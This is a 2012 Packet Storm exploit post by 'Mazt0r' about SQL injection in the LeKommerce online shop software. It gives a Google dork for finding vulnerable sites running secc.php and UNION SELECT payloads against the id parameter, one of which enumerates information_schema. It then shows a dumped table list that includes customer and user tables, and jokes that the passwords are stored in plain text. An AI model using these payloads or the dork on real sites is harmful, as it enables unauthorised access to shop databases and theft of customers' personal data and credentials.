LeKommerce Online Shop SQL Injection

2012-03-07T00:00:00
ID PACKETSTORM:110532
Type packetstorm
Reporter Mazt0r
Modified 2012-03-07T00:00:00

Description

                                        
                                            `# Author: Mazt0r  
# Exploit Title: Online Shop SQLI LeKommerce  
# Date: 04 MARCH 2012  
# software: LeKommerce  
# link: http://www.lekommerce.com/  
# Version: "All version's"  
# Category: Commerce online  
# Tested on: Linux  
D0rk: inurl:secc.php?id=  
=====================================  
Exploit :  
======================  
http://localhost/path/secc.php?id={sqli}  
======================  
Example:  
======================  
http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7--  
http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7+from+information_schema.tables--  
======================  
dbs:  
======================  
+--------------------------------+  
| t_clientes |  
| t_colores |  
| t_colores_idiomas |  
| t_configuracionglobal |  
| t_emailing |  
| t_emailingcliente |  
| t_facturascompra |  
| t_facturasventa |  
| t_familias |  
| t_familias_idiomas |  
| t_formaspago |  
| t_idiomas |  
| t_incidencias |  
| t_iva |  
| t_marcas |  
| t_menusuperior |  
| t_noticias |  
| t_productos |  
| t_productos_idiomas |  
| t_proveedores |  
| t_provincias |  
| t_rel_productos_tallas_colores |  
| t_rel_tallas_colores |  
| t_seccionesproductos |  
| t_seccionesproductos_idiomas |  
| t_series |  
| t_subfamilias |  
| t_subfamilias_idiomas |  
| t_tallas |  
| t_tallas_idiomas |  
| t_tiposperfiles |  
| t_traducciones |  
| t_usuarios |  
+--------------------------------+  
PASSWD: TEXT PLAIN? <<<--- SECURE? EPIC!  
--------------Gr33tZ------------------  
DDLR - CYBERLOCOS - Thelatin - K4rl -Cpum4 - N350k - hkm - nitr0us - Xianur0 - All Firends!  
----------------------------------  
Blog: maztor.blogspot.com  
Twitter: @Mazt0r  
----------------------------------  
  
`